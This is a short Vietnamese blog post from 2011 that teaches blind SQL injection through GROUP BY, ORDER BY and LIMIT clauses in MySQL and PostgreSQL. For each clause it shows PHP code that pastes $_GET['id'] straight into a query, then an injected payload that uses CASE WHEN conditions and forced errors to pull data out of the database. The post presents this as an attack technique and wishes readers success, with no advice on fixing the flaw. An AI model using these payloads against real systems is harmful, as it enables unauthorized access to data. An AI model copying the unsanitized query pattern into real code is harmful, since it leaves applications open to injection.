Thứ Bảy, 26 tháng 2, 2011

Kỹ thuật tấn công Sql Injection thông qua Group by,Order by,Limit

21:03 zeko sock No comments

Thông thường các bạn thường tấn công SQL Injection theo mệnh đề where trong câu lệnh select.Hôm nay pantez sẽ mở rộng thêm cách tấn công thông qua Group by,Order by,Limit

GROUP BY
vd :đối với MySQL 

Code:
"SELECT id, name FROM users GROUP BY "
. $_GET['id']
ta có thể biến đổi như sau
Code:
SELECT id, name FROM users GROUP BY 1,
(SELECT (CASE WHEN (điều kiện) THEN 1 ELSE
1*(SELECT table_name FROM
information_schema.tables) END))

ORDER BY
vd: đối với PostgreSQL 
Code:
"SELECT id, name FROM users ORDER BY "
. $_GET['id']
thành
Code:
SELECT id, name FROM users ORDER BY 1,
(SELECT (CASE WHEN (điều kiện) THEN 1 ELSE
1/0 END))
LIMIT
vd: đối với MySQL
Code:
"SELECT id, name FROM users LIMIT 0, "
. $_GET['id']
thành
Code:
SELECT id, name FROM users LIMIT 0, 1
UNION ALL SELECT (CASE WHEN (điều kiện)
THEN 1 ELSE 1*(SELECT table_name FROM
information_schema.tables) END), NULL
Chúc các bạn thành công.

Posted in: ,,

0 nhận xét:

Đăng nhận xét

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by mkha.hero